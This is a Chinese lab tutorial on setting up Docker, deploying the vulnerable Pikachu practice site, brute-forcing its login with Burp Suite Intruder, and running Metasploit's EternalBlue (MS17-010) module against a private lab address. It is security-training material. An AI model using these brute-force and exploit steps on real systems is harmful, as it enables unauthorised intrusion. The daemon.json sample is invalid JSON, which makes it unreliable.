基于docker进行渗透测试环境的快速搭建

一、docker的安装

(一)更新软件包索引的命令

apt update

问题:返回信息出错,通过返回信息和date指令查看当前系统信息,发现是系统时间不同步的问题

date

解决:同步系统时间(使用NTP同步时间)

①安装 NTP 客户端

sudo apt install ntpdate -y

②手动同步时间(使用阿里云 NTP 服务器)

sudo ntpdate ntp.aliyun.com

③启用并启动时间同步服务

sudo systemctl enable systemd-timesyncd

sudo systemctl start systemd-timesyncd

④验证时间同步状态

timedatectl

命令执行后显示内容:

(二)解决问题后,重新更新软件包索引的命令

apt update

根据执行命令后的反馈信息运行apt list --upgradable命令,最终完成更新软件包索引

(三)基于 Debian 或 Ubuntu 的 Linux 系统中安装 Docker 引擎(docker.io 包)和 Docker Compose 工具(docker-compose 包)

apt-get install docker.io docker-compose

二、docker改变镜像源

(一)进入/etc/docker目录(没有的话需要创建)

有就直接进入

cd /etc/docker

没有就创建

sudo mkdir -p /etc/docker

mkdir 是创建目录,-p 确保递归创建(父目录不存在则自动建),目标路径是 /etc/docker 。

当前已是 root 用户(提示符 root@... ),sudo 是用于普通用户提权,此处其实没必要加 sudo 。

(二)配置文件 daemon.json 

用 nano 编辑器操作 Docker 守护进程配置文件 daemon.json ,用于自定义 Docker 运行参数(比如镜像源、存储驱动、日志配置等等) 。

nano daemon.json

编写文件内容如下

{

"live-restore":true

"registry-mirrors":[

"https://docker.m.daocloud.io",

"https://xxx.mirror.aliyuncs.com"]

}

(三)重启Docker服务

让 systemd 重新加载服务配置,常配合 Docker 等服务配置变更后使用

systemctl daemon-reload

重启 Docker 服务

一般重启Docker服务后,运行信息结果提醒需要使用systemctl daemon-reload命令,让systemd 重新加载服务配置

systemctl restart docker

显示 Docker 系统的相关信息

docker info

查看Docker服务状态

systemctl status docker.service

(四)拉取镜像源

从远程镜像仓库下载nginx镜像到本地 Docker 主机(拉取镜像源)

docker pull nginx

三、docker设置代理(docker挂载)(未成功版)

(一)设置docker代理:创建文件夹以及对应的文件

/etc/system/systemd/docker.service.d/http-proxy.conf

cd /etc/systemd/system

mkdir docker.service.d

vim http-proxy.conf

vim http - proxy.conf:使用 vim 编辑器创建并编辑 http - proxy.conf 文件,该文件一般用于配置 Docker 服务访问外部镜像仓库等时的 HTTP 代理参数(比如公司网络需要通过代理才能访问外网拉取 Docker 镜像 )

(二)在该文件中配置自己的代理ip以及代理端口

[Service]
Environment=“HTTP_PROXY=http://主机真实IP:VPN的端口号”
Environment=“HTTPS_PROXY=http://主机真实IP:VPN的端口号”
Environment=“NO_PROXY=localhost,127.0.0.1”

(三)拉取镜像源

systemctl daemon-reload
systemctl restart docker
docker pull centos

连接超时,拉取失败

拉取镜像源选择  二 / 三  其中一种方法就行!!!

小皮面板搭建pikachu靶场

一、启动设备

Apache2.4.39和MySQL5.7.26

二、创建网站

点击创建网站,填写基本配置信息

三、确定pikachu路径

(一)将pikachu文件放在phpstudy_pro/WWW/路径下

(二)打开phpstudy_pro/WWW/pikachu/pikachu/inc路径下config.inc.php文件,并根据注释要求填写信息,一般只需要改DBUSERD(用户名)和BPW(密码),若是小皮面板的MySQL更改了端口号(默认为3306),这里需要改写一下DBPORT端口号

(三)点击配置,将启动端口填写为3307,防止与本地数据库的端口号3306发生冲突,所以此处改成了3307

 

四、打开网站

五、pikachu靶场搭建完成

bp暴力破解pikachu登录步骤

一、打开bp及其内置浏览器

打开BurpSuite,并点击下图橙色底色的Open browser打开内置浏览器

二、开启Intercept,并打开pikachu网页

来到Proxy,点击Intercept,变成intercept on(如下图蓝色底色部分),在内置浏览器里输入pikachu网址:localhost/pikachu/pikachu,并点击Forward放行,显示出pikachu界面

三、点击基于表单的暴力破解

四、登录界面显示

按照如下图步骤进行,这里需要再次点击Forward放行才可显示出登录界面

五、随机输入账号密码Login登录

六、右击拦截信息,点击Send to Intruder

七、来到Intruder界面

八、选中要暴力破解的位置

这里暴力破解密码,选中 “Add $"在密码前面添加$符号

九、加载密码文件

(一)如下图步骤点击

(二)点击选择自己提前准备好的密码文件打开

十、Start attack 开始攻击

点击Start attack(开始攻击)导进来的密码如下图框选

十一、破解结果

破解密码中

十二、测试

根据破解密码信息,选取疑似正确的密码进行测试,此处登录成功的密码是123456

msf复现永恒之蓝

一、切换root用户

su root

二、启动渗透测试工具msf(Metasploit Framework)

msfconsole

三、查找  "永恒之蓝"  漏洞相关可用模块

search MS17-010

通过  "search 漏洞编号"  查找MS17-010 漏洞(永恒之蓝(EternalBlue)) 相关的所有可用模块

四、查询模块信息

info exploit/windows/smb/ms17_010_eternalblue

查询上条命令编号为0的exploit/windows/smb/ms17_010_eternalblue模块信息

五、使用模块

use exploit/windows/smb/ms17_010_eternalblue 

use 0

可直接  "use 模块名称"  ,也可   "use 模块编码" 去使用模块 

六、查看当前模块需要的选项

show options

Required列是yes的是必选(必填),在yes的前提下Current Setting有数值的是默认数值,若没有填上必选(必填)项内容,就是那个默认数值

七、设置必填参数

set RHOSTS 192.168.136.136

例:设目标主机为192.168.136.136

八、再次查看选项信息

show options

九、运行模块

run

run/exploit运行,拿下目标电脑ip

十、检查运行是否成功

ipconfig

检查是否拿下(下图未拿下)

Logo

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐